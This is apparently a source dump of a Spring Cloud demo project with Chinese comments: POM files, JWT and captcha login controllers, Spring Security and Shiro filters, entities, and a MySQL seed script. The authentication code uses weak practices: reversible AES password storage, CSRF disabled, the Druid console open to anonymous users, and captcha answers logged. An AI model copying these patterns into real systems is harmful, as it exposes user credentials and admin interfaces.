<artifactId>spring-cloud-alibaba-dependencies</artifactId>
<version>2.1.0.RELEASE</version>
<type>pom</type>
<scope>import</scope>
</dependency>
</dependencies>
</dependencyManagement>
<build>
<pluginManagement>
<plugins>
<!-- <plugin>-->
<!-- <groupId>org.apache.maven.plugins</groupId>-->
<!-- <artifactId>maven-compiler-plugin</artifactId>-->
<!-- <configuration>-->
<!-- <source>1.8</source>-->
<!-- <target>1.8</target>-->
<!-- <encoding>UTF-8</encoding>-->
<!-- </configuration>-->
<!-- </plugin>-->
<plugin>
<groupId>org.springframework.boot</groupId>
<artifactId>spring-boot-maven-plugin</artifactId>
</plugin>
<!--Docker配置-->
<plugin>
<groupId>com.spotify</groupId>
<artifactId>docker-maven-plugin</artifactId>
<version>${docker.maven.plugin.version}</version>
<executions>
<execution>
<id>build-image</id>
<phase>package</phase>
<goals>
<goal>build</goal>
</goals>
</execution>
</executions>
<configuration>
<!--docker 镜像名称-->
<imageName>micro/${project.artifactId}:${project.version}</imageName>
<!--docker 路径-->
<dockerHost>${docker.host}</dockerHost>
<baseImage>java:8</baseImage>
<!--执行执行docker命令-->
<entryPoint>["java", "-jar", "-Dspring.profiles.active=prod","/${project.build.finalName}.jar"]
</entryPoint>
<!-- <entryPoint>[docker rmi $(docker images -f "dangling=true" -q)]-->
<!-- </entryPoint>-->
<forceTags>true</forceTags>
<!--复制jar到docker的指定容器-->
<resources>
<resource>
<targetPath>/</targetPath>
<directory>${project.build.directory}</directory>
<include>${project.build.finalName}.jar</include>
</resource>
</resources>
</configuration>
</plugin>
</plugins>
</pluginManagement>
<!--支持在yml文件中使用@@来引用pom文件中的变量-->
<resources>
<resource>
<directory>src/main/resources</directory>
<filtering>true</filtering>
</resource>
</resources>
</build>
</project><file_sep>/micro-cloud-demo/src/main/java/com/cloud/modules/system/controller/LoginController.java
package com.cloud.modules.system.controller;
import cn.hutool.core.util.IdUtil;
import com.alibaba.fastjson.JSONObject;
import com.cloud.annotation.AnonymousAccess;
import com.cloud.bo.SysUserDetails;
import com.cloud.common.api.Result;
import com.cloud.common.constant.CacheConstant;
import com.cloud.common.constant.CommonConstant;
import com.cloud.config.JwtConfig;
import com.cloud.modules.system.service.ISysUserService;
import com.cloud.security.TokenProvider;
import com.cloud.modules.system.entity.LoginUser;
import com.cloud.modules.system.entity.SysUser;
import com.cloud.modules.system.model.SysLoginModel;
import com.cloud.modules.utils.JwtUtil;
import com.cloud.modules.utils.RedisUtils;
import com.cloud.modules.utils.StringUtils;
import com.cloud.modules.utils.encryption.AesEncryptUtil;
import com.cloud.util.JwtTokenUtil;
import com.wf.captcha.ArithmeticCaptcha;
import io.swagger.annotations.Api;
import io.swagger.annotations.ApiOperation;
import lombok.extern.slf4j.Slf4j;
import org.springframework.beans.BeanUtils;
import org.springframework.beans.factory.annotation.Autowired;
import org.springframework.security.authentication.UsernamePasswordAuthenticationToken;
import org.springframework.security.config.annotation.authentication.builders.AuthenticationManagerBuilder;
import org.springframework.security.core.Authentication;
import org.springframework.security.core.context.SecurityContextHolder;
import org.springframework.web.bind.annotation.*;
import javax.servlet.http.HttpServletRequest;
import javax.validation.Valid;
import java.util.HashMap;
import java.util.Map;
import java.util.concurrent.TimeUnit;
@Slf4j
@RestController
@RequestMapping("sys")
@Api(tags = "Spring Security 登录")
public class LoginController {
@Autowired
private RedisUtils redisUtils;
@Autowired
private ISysUserService sysUserService;
@Autowired
private JwtTokenUtil jwtTokenUtil;
@AnonymousAccess
@PostMapping("/login")
@ApiOperation("用户登录")
public Result<JSONObject> login(@RequestBody @Valid SysLoginModel sysLoginModel){
Result<JSONObject> res = new Result<>();
String username = sysLoginModel.getUsername();
String password = sysLoginModel.getPassword();
// 获取到验证码
String checkCode = (String) redisUtils.get(sysLoginModel.getUuid());
// 清除验证码
redisUtils.del(sysLoginModel.getUuid());
if(StringUtils.isBlank(checkCode)){
res.error500("验证码不存在或已过期");
return res;
}
if(StringUtils.isBlank(sysLoginModel.getCaptcha()) || !sysLoginModel.getCaptcha().equalsIgnoreCase(checkCode)){
res.error500("验证码错误");
return res;
}
SysUser user = sysUserService.getUserByName(username);
// 密码验证
String encryptPassword = "";
try {
// 密码加密
encryptPassword = AesEncryptUtil.encrypt(password);
}catch (Exception e){
e.printStackTrace();
}
if(!encryptPassword.equals(user.getPassword())){
res.error500("用户名或者密码错误");
return res;
}
// 保存在线用户
LoginUser loginUser = new LoginUser();
BeanUtils.copyProperties(user,loginUser);
SysUserDetails userDetails = new SysUserDetails(loginUser);
UsernamePasswordAuthenticationToken authentication = new
UsernamePasswordAuthenticationToken(userDetails, null);
SecurityContextHolder.getContext().setAuthentication(authentication);
// 生成token
String token = jwtTokenUtil.generateToken(userDetails);
// 设置Token缓存有效时间
redisUtils.set(CommonConstant.PREFIX_USER_TOKEN + token,token);
redisUtils.expire(CommonConstant.PREFIX_USER_TOKEN + token, JwtUtil.EXPIRE_TIME * 2 / 1000);
// 保存在线用户
redisUtils.set(CacheConstant.SYS_USERS_CACHE + ":" + token,loginUser);
redisUtils.expire(CacheConstant.SYS_USERS_CACHE + ":" + token, JwtUtil.EXPIRE_TIME * 2 / 1000);
JSONObject obj = new JSONObject();
obj.put("token", token);
obj.put("userInfo", loginUser);
res.setSuccess(true);
res.setResult(obj);
return res;
}
/**
* 获取验证码(EasyCaptcha)
* 请参考:https://gitee.com/whvse/EasyCaptcha
*/
@AnonymousAccess
@GetMapping("/getImageCode")
@ApiOperation("获取图像验证码")
public Result<Map<String,Object>> getImageCode(){
Result res = new Result();
// 验证码为算数类型
ArithmeticCaptcha captcha = new ArithmeticCaptcha(111, 36);
// 设置几位数运算 默认是两位
captcha.setLen(2);
// 获取到运算结果
String result = captcha.text();
System.out.println("-------------验证码----------------" + result);
// 生成验证码唯一标识
String uuid = JwtConfig.CODEKEY + IdUtil.simpleUUID();
// 保存验证码(1分钟)
redisUtils.set(uuid,result,1L);
Map<String,Object> map = new HashMap<String, Object>(2){{
put("uuid",uuid);
put("img",captcha.toBase64());
}};
res.setResult(map);
return res;
}
@PostMapping("/test1")
// @AnonymousAccess
@ApiOperation("测试 Spring Security权限")
public Result<?> testSecurity(){
return Result.ok("hello world.................");
}
}
<file_sep>/micro-cloud-common/src/main/java/com/cloud/modules/system/entity/SysUser.java
package com.cloud.modules.system.entity;
import com.baomidou.mybatisplus.annotation.TableLogic;
import com.baomidou.mybatisplus.annotation.TableName;
import com.fasterxml.jackson.annotation.JsonFormat;
import com.fasterxml.jackson.annotation.JsonProperty;
import lombok.Data;
import lombok.EqualsAndHashCode;
import lombok.ToString;
import lombok.experimental.Accessors;
import org.springframework.format.annotation.DateTimeFormat;
import java.io.Serializable;
import java.util.Date;
@Data
@ToString
@TableName("sys_user")
@Accessors(chain = true)
@EqualsAndHashCode(callSuper = false)
public class SysUser extends BaseEntity implements Serializable {
private static final long serialVersionUID = 1L;
/**
* 登录账号
*/
private String username;
/**
* 真实姓名
*/
private String realname;
/**
* 密码
*/
@JsonProperty(access = JsonProperty.Access.WRITE_ONLY)
private String password;
/**
* 头像
*/
private String avatar;
/**
* 生日
*/
@JsonFormat(timezone = "GMT+8", pattern = "yyyy-MM-dd")
@DateTimeFormat(pattern = "yyyy-MM-dd")
private Date birthday;
/**
* 性别(1:男 2:女)
*/
private Integer sex;
/**
* 电子邮件
*/
private String email;
/**
* 电话
*/
private String phone;
/**
* 部门code(当前选择登录部门)
*/
private String orgCode;
/**
* 用户状态(1:正常 2:冻结 )
*/
private Integer status;
/**
* 删除状态(0,正常,1已删除)
*/
@TableLogic
private Integer delFlag;
/**
* 工号,唯一键
*/
private String workNo;
/**
* 职务,关联职务表
*/
private String post;
/**
* 座机号
*/
private String telephone;
/**
* 同步工作流引擎1同步0不同步
*/
private Integer activitiSync;
/**
* 用户身份(0 普通成员 1 上级)
*/
private Integer userIdentity;
/**
* 负责部门
*/
private String departIds;
/**
* 第三方登录的唯一标识
*/
private String thirdId;
/**
* 第三方类型
* (github/github,wechat_enterprise/企业微信,dingtalk/钉钉)
*/
private String thirdType;
}
<file_sep>/micro-cloud-security/src/main/java/com/cloud/config/SecurityConfig.java
package com.cloud.config;
import com.cloud.annotation.AnonymousAccess;
import com.cloud.security.JwtAccessDeniedHandler;
import com.cloud.security.JwtAuthenticationEntryPoint;
import com.cloud.security.TokenConfigurer;
import com.cloud.modules.utils.SpringContextUtils;
import com.cloud.security.TokenFilter;
import lombok.extern.slf4j.Slf4j;
import org.springframework.beans.factory.annotation.Autowired;
import org.springframework.context.annotation.Bean;
import org.springframework.context.annotation.Configuration;
import org.springframework.http.HttpMethod;
import org.springframework.security.config.annotation.authentication.builders.AuthenticationManagerBuilder;
import org.springframework.security.config.annotation.method.configuration.EnableGlobalMethodSecurity;
import org.springframework.security.config.annotation.web.builders.HttpSecurity;
import org.springframework.security.config.annotation.web.configuration.EnableWebSecurity;
import org.springframework.security.config.annotation.web.configuration.WebSecurityConfigurerAdapter;
import org.springframework.security.config.http.SessionCreationPolicy;
import org.springframework.security.crypto.bcrypt.BCryptPasswordEncoder;
import org.springframework.security.crypto.password.PasswordEncoder;
import org.springframework.security.web.authentication.UsernamePasswordAuthenticationFilter;
import org.springframework.web.filter.CorsFilter;
import org.springframework.web.method.HandlerMethod;
import org.springframework.web.servlet.mvc.method.RequestMappingInfo;
import org.springframework.web.servlet.mvc.method.annotation.RequestMappingHandlerMapping;
import java.util.HashSet;
import java.util.Map;
import java.util.Set;
@Slf4j
@Configuration
@EnableWebSecurity // 启用Spring Security的Web安全支持
@EnableGlobalMethodSecurity(prePostEnabled = true, securedEnabled = true)
public class SecurityConfig extends WebSecurityConfigurerAdapter {
@Autowired
private JwtAuthenticationEntryPoint authenticationEntryPoint;
@Autowired
private JwtAccessDeniedHandler jwtAccessDeniedHandler;
@Override
protected void configure(HttpSecurity httpSecurity) throws Exception {
// @AnonymousAccess 允许匿名访问接口
// 获取匿名标记 url:@AnonymousAccess
Map<RequestMappingInfo, HandlerMethod> handlerMethodMap =
SpringContextUtils.getBean(RequestMappingHandlerMapping.class).getHandlerMethods();
Set<String> anonymousUrls = new HashSet<>();
for (Map.Entry<RequestMappingInfo, HandlerMethod> infoEntry : handlerMethodMap.entrySet()) {
HandlerMethod handlerMethod = infoEntry.getValue();
AnonymousAccess anonymousAccess = handlerMethod.getMethodAnnotation(AnonymousAccess.class);
if (null != anonymousAccess) {
anonymousUrls.addAll(infoEntry.getKey().getPatternsCondition().getPatterns());
}
}
// 禁用 CSRF
httpSecurity
// https://blog.csdn.net/qq_35226176/article/details/106154774
// 禁用 CSRF 麻蛋 如果不禁用则无法处理Post请求(既不报错 也不返回东西)
.csrf().disable()
// 允许配置异常处理
.exceptionHandling()
// 认证
.authenticationEntryPoint(authenticationEntryPoint)
// 授权
.accessDeniedHandler(jwtAccessDeniedHandler)
// 防止iframe 造成跨域
.and()
// 将安全标头添加到响应
.headers()
.frameOptions()
.disable()
// 不创建会话
.and()
.sessionManagement()
.sessionCreationPolicy(SessionCreationPolicy.STATELESS)
.and()
// 授权配置
.authorizeRequests()
.antMatchers("/").permitAll()
// 静态资源等等
.antMatchers(
HttpMethod.GET,
"/*.html",
"/**/*.html",
"/**/*.css",
"/**/*.js",
"/webSocket/**"
).permitAll()
// swagger 文档
.antMatchers("/swagger-ui.html").permitAll()
.antMatchers("/swagger**/**").permitAll()
.antMatchers("/v2/**").permitAll()
.antMatchers("/swagger-resources/**").permitAll()
.antMatchers("/*/api-docs").permitAll()
// 文件
.antMatchers("/avatar/**").permitAll()
.antMatchers("/file/**").permitAll()
// 阿里巴巴 druid
.antMatchers("/druid/**").permitAll()
// 放行OPTIONS请求
// .antMatchers(HttpMethod.OPTIONS, "/**").permitAll()
// 自定义匿名访问所有url放行
.antMatchers(anonymousUrls.toArray(new String[0])).permitAll()
// 所有请求都拦截
.anyRequest().authenticated()
// 自定义权限拦截器JWT过滤器
.and()
.apply(TokenConfigurer());
}
@Bean
public TokenConfigurer TokenConfigurer() {
return new TokenConfigurer();
}
}
<file_sep>/micro-cloud-gateway/src/main/java/com/cloud/MicroGatewayApplication.java
package com.cloud;
import lombok.extern.slf4j.Slf4j;
import org.springframework.boot.SpringApplication;
import org.springframework.boot.autoconfigure.SpringBootApplication;
import org.springframework.cloud.client.discovery.EnableDiscoveryClient;
import org.springframework.cloud.gateway.route.RouteLocator;
import org.springframework.cloud.gateway.route.builder.RouteLocatorBuilder;
import org.springframework.context.ConfigurableApplicationContext;
import org.springframework.core.env.Environment;
import java.net.InetAddress;
import java.net.UnknownHostException;
@Slf4j
@SpringBootApplication
@EnableDiscoveryClient
public class MicroGatewayApplication {
public static void main(String[] args) throws UnknownHostException {
ConfigurableApplicationContext applicationContext = SpringApplication.run(MicroGatewayApplication.class, args);
String userName = applicationContext.getEnvironment().getProperty("jeecg.test");
Environment env = applicationContext.getEnvironment();
String ip = InetAddress.getLocalHost().getHostAddress();
String port = env.getProperty("server.port");
System.err.println("user name :" +userName);
log.info("\n----------------------------------------------------------\n\t" +
"Application Micro-Cloud is running! Access URLs:\n\t" +
"Local: \t\thttp://localhost:" + port + "/doc.html" + "\n\t" +
"External: \thttp://" + ip + ":" + port + "/doc.html" + "\n\t" +
"Swagger-UI: \t\thttp://" + ip + ":" + port + "/doc.html\n" +
"--------------------------网关启动成功-------------------------");
}
//@Bean
// 基于代码配置路由方式
public RouteLocator customRouteLocator(RouteLocatorBuilder builder) {
return builder.routes()
.route("path_route", r -> r.path("/get")
.uri("http://httpbin.org"))
.route("baidu_path_route", r -> r.path("/baidu")
.uri("https://news.baidu.com/guonei"))
.route("host_route", r -> r.host("*.myhost.org")
.uri("http://httpbin.org"))
.route("rewrite_route", r -> r.host("*.rewrite.org")
.filters(f -> f.rewritePath("/foo/(?<segment>.*)", "/${segment}"))
.uri("http://httpbin.org"))
.route("hystrix_route", r -> r.host("*.hystrix.org")
.filters(f -> f.hystrix(c -> c.setName("slowcmd")))
.uri("http://httpbin.org"))
.route("hystrix_fallback_route", r -> r.host("*.hystrixfallback.org")
.filters(f -> f.hystrix(c -> c.setName("slowcmd").setFallbackUri("forward:/hystrixfallback")))
.uri("http://httpbin.org"))
.build();
}
}<file_sep>/micro-cloud-common/src/main/java/com/cloud/feign/factory/SysLogFeignClientFallbackFactory.java
package com.cloud.feign.factory;
import com.cloud.feign.SysLogFeignClient;
import feign.hystrix.FallbackFactory;
import lombok.extern.slf4j.Slf4j;
import org.springframework.stereotype.Component;
@Slf4j
public class SysLogFeignClientFallbackFactory implements FallbackFactory<SysLogFeignClient> {
@Override
public SysLogFeignClient create(Throwable throwable) {
return null;
}
}
<file_sep>/micro-cloud-common/src/main/java/com/cloud/modules/utils/CommonUtils.java
package com.cloud.modules.utils;
import com.cloud.common.constant.DataBaseConstant;
import lombok.extern.slf4j.Slf4j;
import javax.sql.DataSource;
import java.sql.Connection;
import java.sql.DatabaseMetaData;
import java.sql.SQLException;
@Slf4j
public class CommonUtils {
/**
* 判断文件名是否带盘符,重新处理
*/
public static String getFileName(String fileName){
//判断是否带有盘符信息
// Check for Unix-style path
int unixSep = fileName.lastIndexOf('/');
// Check for Windows-style path
int winSep = fileName.lastIndexOf('\\');
// Cut off at latest possible point
int pos = (winSep > unixSep ? winSep : unixSep);
if (pos != -1) {
// Any sort of path separator found...
fileName = fileName.substring(pos + 1);
}
//替换上传文件名字的特殊字符
fileName = fileName.replace("=","").replace(",","").replace("&","");
return fileName;
}
/** 当前系统数据库类型 */
private static String DB_TYPE = "";
public static String getDatabaseType() {
if(oConvertUtils.isNotEmpty(DB_TYPE)){
return DB_TYPE;
}
DataSource dataSource = SpringContextUtils.getApplicationContext().getBean(DataSource.class);
try {
return getDatabaseTypeByDataSource(dataSource);
} catch (SQLException e) {
//e.printStackTrace();
log.warn(e.getMessage());
return "";
}
}
private static String getDatabaseTypeByDataSource(DataSource dataSource) throws SQLException{
if("".equals(DB_TYPE)) {
Connection connection = dataSource.getConnection();
try {
DatabaseMetaData md = connection.getMetaData();
String dbType = md.getDatabaseProductName().toLowerCase();
if(dbType.indexOf("mysql")>=0) {
DB_TYPE = DataBaseConstant.DB_TYPE_MYSQL;
}else if(dbType.indexOf("oracle")>=0) {
DB_TYPE = DataBaseConstant.DB_TYPE_ORACLE;
}else if(dbType.indexOf("sqlserver")>=0||dbType.indexOf("sql server")>=0) {
DB_TYPE = DataBaseConstant.DB_TYPE_SQLSERVER;
}else if(dbType.indexOf("postgresql")>=0) {
DB_TYPE = DataBaseConstant.DB_TYPE_POSTGRESQL;
}else {
throw new IllegalAccessError("数据库类型:["+dbType+"]不识别!");
}
} catch (Exception e) {
log.error(e.getMessage(), e);
}finally {
connection.close();
}
}
return DB_TYPE;
}
}
<file_sep>/micro-cloud-security/src/main/java/com/cloud/security/TokenConfigurer.java
package com.cloud.security;
import lombok.extern.slf4j.Slf4j;
import org.springframework.security.config.annotation.SecurityConfigurerAdapter;
import org.springframework.security.config.annotation.web.builders.HttpSecurity;
import org.springframework.security.web.DefaultSecurityFilterChain;
import org.springframework.security.web.authentication.UsernamePasswordAuthenticationFilter;
@Slf4j
public class TokenConfigurer extends SecurityConfigurerAdapter<DefaultSecurityFilterChain, HttpSecurity> {
@Override
public void configure(HttpSecurity httpSecurity) throws Exception {
TokenFilter customFilter = new TokenFilter();
// 添加自定义的JWT拦截器
httpSecurity.addFilterBefore(customFilter, UsernamePasswordAuthenticationFilter.class);
}
}
<file_sep>/micro-cloud-system/src/main/java/com/cloud/modules/system/controller/SysLogController.java
package com.cloud.modules.system.controller;
import com.alibaba.fastjson.JSON;
import com.alibaba.fastjson.JSONObject;
import com.cloud.common.api.Result;
import com.cloud.modules.system.service.ISysLogService;
import com.cloud.modules.system.entity.SysLog;
import io.swagger.annotations.Api;
import io.swagger.annotations.ApiOperation;
import lombok.extern.slf4j.Slf4j;
import org.springframework.beans.factory.annotation.Autowired;
import org.springframework.web.bind.annotation.PostMapping;
import org.springframework.web.bind.annotation.RequestBody;
import org.springframework.web.bind.annotation.RequestMapping;
import org.springframework.web.bind.annotation.RestController;
@Slf4j
@RestController
@Api("日志操作类")
@RequestMapping("/sys/log")
public class SysLogController {
@Autowired
private ISysLogService sysLogService;
/**
* 保存日志:
* 1: AOP操作 Fegin远程调用, 用户对系统操作一次 程序 会自动调用
*/
@PostMapping("/save")
// @ApiOperation("新增日志") // 由于是系统自动调用 该接口不需要提供给前端工程师
public Result<?> saveLog(@RequestBody JSONObject jsonObject){
Result<?> res = new Result<>();
// JSON字符串转对象
SysLog sysLog = JSON.parseObject(jsonObject.toJSONString(), SysLog.class);
sysLogService.save(sysLog);
return res;
}
}
<file_sep>/micro-cloud-shiro/src/main/java/com/cloud/modules/shiro/authc/aop/JwtFilter.java
package com.cloud.modules.shiro.authc.aop;
import com.cloud.annotation.AnonymousAccess;
import com.cloud.common.constant.CacheConstant;
import com.cloud.common.constant.CommonConstant;
import com.cloud.modules.shiro.authc.JwtToken;
import com.cloud.modules.shiro.vo.DefContants;
import com.cloud.modules.system.entity.LoginUser;
import com.cloud.modules.system.entity.SysUser;
import com.cloud.modules.utils.JwtUtil;
import com.cloud.modules.utils.RedisUtils;
import com.cloud.modules.utils.SpringContextUtils;
import com.cloud.modules.utils.StringUtils;
import lombok.extern.slf4j.Slf4j;
import org.apache.shiro.authc.AuthenticationException;
import org.apache.shiro.subject.PrincipalCollection;
import org.apache.shiro.web.filter.authc.BasicHttpAuthenticationFilter;
import org.springframework.beans.factory.annotation.Autowired;
import org.springframework.http.server.reactive.ServerHttpRequest;
import org.springframework.web.method.HandlerMethod;
import org.springframework.web.servlet.mvc.method.RequestMappingInfo;
import org.springframework.web.servlet.mvc.method.annotation.RequestMappingHandlerMapping;
import javax.servlet.ServletRequest;
import javax.servlet.ServletResponse;
import javax.servlet.http.HttpServletRequest;
import java.util.Map;
import java.util.Set;
/**
* 鉴权登录鉴权拦截器
*/
@Slf4j
public class JwtFilter extends BasicHttpAuthenticationFilter {
@Autowired
private RedisUtils redisUtils;
/**
* 执行登录认证
*/
@Override
protected boolean isAccessAllowed(ServletRequest request, ServletResponse response, Object mappedValue) {
try {
// 获取到请求的URL
String url = ((HttpServletRequest) request).getRequestURI();
// 获取匿名标记 url:@AnonymousAccess
Map<RequestMappingInfo, HandlerMethod> handlerMethodMap = SpringContextUtils.getBean(RequestMappingHandlerMapping.class)
.getHandlerMethods();
for (Map.Entry<RequestMappingInfo, HandlerMethod> infoEntry : handlerMethodMap.entrySet()) {
Set<String> requestURIS = infoEntry.getKey().getPatternsCondition().getPatterns();
for(String requestURI : requestURIS){
// 如果当前访问路径 使用 @AnonymousAccess 注解直接放行
if(url.equals(requestURI)){
HandlerMethod handlerMethod = infoEntry.getValue();
AnonymousAccess anonymousAccess = handlerMethod.getMethodAnnotation(AnonymousAccess.class);
if (null != anonymousAccess) {
log.info("-------使用匿名访问注解 @AnonymousAccess 放行--------");
return true;
}
}
}
}
executeLogin(request, response);
return true;
} catch (Exception e) {
throw new AuthenticationException("Token失效,请重新登录", e);
}
}
@Override
protected boolean executeLogin(ServletRequest request, ServletResponse response) throws Exception {
HttpServletRequest httpServletRequest = (HttpServletRequest) request;
String token = httpServletRequest.getHeader(DefContants.X_ACCESS_TOKEN);
JwtToken jwtToken = new JwtToken(token);
// 提交给realm进行登入,如果错误他会抛出异常并被捕获
getSubject(request, response).login(jwtToken);
// 如果没有抛出异常则代表登入成功,返回true
return true;
}
}
<file_sep>/micro-cloud-common/src/main/java/com/cloud/modules/system/entity/SysLog.java
package com.cloud.modules.system.entity;
import com.baomidou.mybatisplus.annotation.TableName;
import java.io.Serializable;
import lombok.Data;
import lombok.EqualsAndHashCode;
import lombok.experimental.Accessors;
/**
* 系统日志表
*/
@Data
@TableName("sys_log")
@Accessors(chain = true)
@EqualsAndHashCode(callSuper = false)
public class SysLog extends BaseEntity implements Serializable {
private static final long serialVersionUID = 1L;
/**
* 耗时
*/
private Long costTime;
/**
* IP
*/
private String ip;
/**
* 请求参数
*/
private String requestParam;
/**
* 请求类型
*/
private String requestType;
/**
* 请求路径
*/
private String requestUrl;
/**
* 请求方法
*/
private String method;
/**
* 操作人用户名称
*/
private String username;
/**
* 操作人用户账户
*/
private String userid;
/**
* 操作详细日志
*/
private String logContent;
/**
* 日志类型(1登录日志,2操作日志)
*/
private Integer logType;
/**
* 操作类型(1查询,2添加,3修改,4删除,5导入,6导出)
*/
private Integer operateType;
}
<file_sep>/micro-cloud-common/pom.xml
<?xml version="1.0" encoding="UTF-8"?>
<project xmlns="http://maven.apache.org/POM/4.0.0"
xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
xsi:schemaLocation="http://maven.apache.org/POM/4.0.0 http://maven.apache.org/xsd/maven-4.0.0.xsd">
<parent>
<artifactId>micro-cloud</artifactId>
<groupId>com.cloud</groupId>
<version>1.0-SNAPSHOT</version>
</parent>
<modelVersion>4.0.0</modelVersion>
<artifactId>micro-cloud-common</artifactId>
<packaging>jar</packaging>
<dependencies>
<dependency>
<groupId>commons-beanutils</groupId>
<artifactId>commons-beanutils</artifactId>
<version>1.8.0</version>
<scope>compile</scope>
</dependency>
<dependency>
<groupId>commons-fileupload</groupId>
<artifactId>commons-fileupload</artifactId>
<version>1.4</version>
<scope>compile</scope>
</dependency>
<!-- web -->
<dependency>
<groupId>org.springframework.boot</groupId>
<artifactId>spring-boot-starter-web</artifactId>
<exclusions>
<!--排除(去除)tomcat依赖-->
<exclusion>
<groupId>org.springframework.boot</groupId>
<artifactId>spring-boot-starter-tomcat</artifactId>
</exclusion>
</exclusions>
</dependency>
<!-- websocket -->
<dependency>
<groupId>org.springframework.boot</groupId>
<artifactId>spring-boot-starter-websocket</artifactId>
<exclusions>
<!--排除(去除)tomcat依赖-->
<exclusion>
<groupId>org.springframework.boot</groupId>
<artifactId>spring-boot-starter-web</artifactId>
</exclusion>
</exclusions>
</dependency>
<!--undertow容器-->
<dependency>
<groupId>org.springframework.boot</groupId>
<artifactId>spring-boot-starter-undertow</artifactId>
</dependency>
<!-- web -->
<!-- spring-cloud begin -->
<!-- nacos -->
<dependency>
<groupId>com.alibaba.cloud</groupId>
<artifactId>spring-cloud-starter-alibaba-nacos-discovery</artifactId>
</dependency>
<dependency>
<groupId>com.alibaba.cloud</groupId>
<artifactId>spring-cloud-starter-alibaba-nacos-config</artifactId>
</dependency>
<!-- feign -->
<dependency>
<groupId>org.springframework.cloud</groupId>
<artifactId>spring-cloud-starter-openfeign</artifactId>
</dependency>
<!-- sentinel 熔断限流 -->
<dependency>
<groupId>com.alibaba.cloud</groupId>
<artifactId>spring-cloud-starter-alibaba-sentinel</artifactId>
</dependency>
<!-- spring-cloud end -->
<dependency>
<groupId>net.logstash.logback</groupId>
<artifactId>logstash-logback-encoder</artifactId>
</dependency>
</dependencies>
</project><file_sep>/doc/db/microcloud_mysql5.7.sql
DROP DATABASE IF EXISTS `micro-cloud`;
create database `micro-cloud` default character set utf8mb4 collate utf8mb4_general_ci;
SET NAMES utf8mb4;
SET FOREIGN_KEY_CHECKS = 0;
USE `micro-cloud`;
-- ----------------------------
-- Table structure for sys_user
-- ----------------------------
DROP TABLE IF EXISTS `sys_user`;
CREATE TABLE `sys_user` (
`id` varchar(32) CHARACTER SET utf8 COLLATE utf8_general_ci NOT NULL COMMENT '主键id',
`username` varchar(100) CHARACTER SET utf8 COLLATE utf8_general_ci NULL DEFAULT NULL COMMENT '登录账号',
`realname` varchar(100) CHARACTER SET utf8 COLLATE utf8_general_ci NULL DEFAULT NULL COMMENT '真实姓名',
`password` varchar(255) CHARACTER SET utf8 COLLATE utf8_general_ci NULL DEFAULT NULL COMMENT '密码',
`avatar` varchar(255) CHARACTER SET utf8 COLLATE utf8_general_ci NULL DEFAULT NULL COMMENT '头像',
`birthday` datetime(0) NULL DEFAULT NULL COMMENT '生日',
`sex` tinyint(1) NULL DEFAULT NULL COMMENT '性别(0-默认未知,1-男,2-女)',
`email` varchar(45) CHARACTER SET utf8 COLLATE utf8_general_ci NULL DEFAULT NULL COMMENT '电子邮件',
`phone` varchar(45) CHARACTER SET utf8 COLLATE utf8_general_ci NULL DEFAULT NULL COMMENT '电话',
`org_code` varchar(64) CHARACTER SET utf8 COLLATE utf8_general_ci NULL DEFAULT NULL COMMENT '机构编码',
`status` tinyint(1) NULL DEFAULT NULL COMMENT '性别(1-正常,2-冻结)',
`del_flag` tinyint(1) NULL DEFAULT NULL COMMENT '删除状态(0-正常,1-已删除)',
`third_id` varchar(100) CHARACTER SET utf8 COLLATE utf8_general_ci NULL DEFAULT NULL COMMENT '第三方登录的唯一标识',
`third_type` varchar(100) CHARACTER SET utf8 COLLATE utf8_general_ci NULL DEFAULT NULL COMMENT '第三方类型',
`activiti_sync` tinyint(1) NULL DEFAULT NULL COMMENT '同步工作流引擎(1-同步,0-不同步)',
`work_no` varchar(100) CHARACTER SET utf8 COLLATE utf8_general_ci NULL DEFAULT NULL COMMENT '工号,唯一键',
`post` varchar(100) CHARACTER SET utf8 COLLATE utf8_general_ci NULL DEFAULT NULL COMMENT '职务,关联职务表',
`telephone` varchar(45) CHARACTER SET utf8 COLLATE utf8_general_ci NULL DEFAULT NULL COMMENT '座机号',
`create_by` varchar(32) CHARACTER SET utf8 COLLATE utf8_general_ci NULL DEFAULT NULL COMMENT '创建人',
`create_time` datetime(0) NULL DEFAULT NULL COMMENT '创建时间',
`update_by` varchar(32) CHARACTER SET utf8 COLLATE utf8_general_ci NULL DEFAULT NULL COMMENT '更新人',
`update_time` datetime(0) NULL DEFAULT NULL COMMENT '更新时间',
`user_identity` tinyint(1) NULL DEFAULT NULL COMMENT '身份(1普通成员 2上级)',
`depart_ids` longtext CHARACTER SET utf8 COLLATE utf8_general_ci NULL COMMENT '负责部门',
PRIMARY KEY (`id`) USING BTREE,
UNIQUE INDEX `index_user_name`(`username`) USING BTREE,
UNIQUE INDEX `uniq_sys_user_work_no`(`work_no`) USING BTREE,
UNIQUE INDEX `uniq_sys_user_username`(`username`) USING BTREE,
UNIQUE INDEX `uniq_sys_user_phone`(`phone`) USING BTREE,
UNIQUE INDEX `uniq_sys_user_email`(`email`) USING BTREE,
INDEX `index_user_status`(`status`) USING BTREE,
INDEX `index_user_del_flag`(`del_flag`) USING BTREE
) ENGINE = InnoDB CHARACTER SET = utf8 COLLATE = utf8_general_ci COMMENT = '用户表' ROW_FORMAT = Dynamic;
INSERT INTO `sys_user` VALUES ('42d153bffeea74f72a9c1697874fa4a7', 'test22', '23232', 'uaaIHVXKz5plwekhq_yK6w', 'user/20190314/ly-plate-e_1552531617500.png', '2019-2-9 00:00:00', 1, '<EMAIL>', '18611782222', NULL, 1, 1, NULL, NULL, 1, NULL, NULL, NULL, 'admin', '2019-1-26 18:01:10', 'admin', '2019-3-23 15:05:50', NULL, NULL);
INSERT INTO `sys_user` VALUES ('a75d45a015c44384a04449ee80dc3503', 'jeecg', 'jeecg', 'uaaIHVXKz5plwekhq_yK6w', 'user/20190220/e1fe9925bc315c60addea1b98eb1cb1349547719_1550656892940.jpg', NULL, 1, NULL, NULL, '财务部', 1, 0, NULL, NULL, 1, '00002', 'devleader', NULL, 'admin', '2019-2-13 16:02:36', 'admin', '2020-5-2 15:34:30', 1, '');
INSERT INTO `sys_user` VALUES ('e9ca23d68d884d4ebb19d07889727dae', 'admin', '管理员', 'uaaIHVXKz5plwekhq_yK6w', 'http://minio.jeecg.com/otatest/temp/lgo33_1583397323099.png', '2018-12-5 00:00:00', 1, '<EMAIL>', '18611111111', 'A01', 1, 0, NULL, NULL, 1, '00001', '总经理', NULL, NULL, '2038-6-21 17:54:10', 'admin', '2020-5-2 18:19:41', 2, 'c6d7cb4deeac411cb3384b1b31278596');
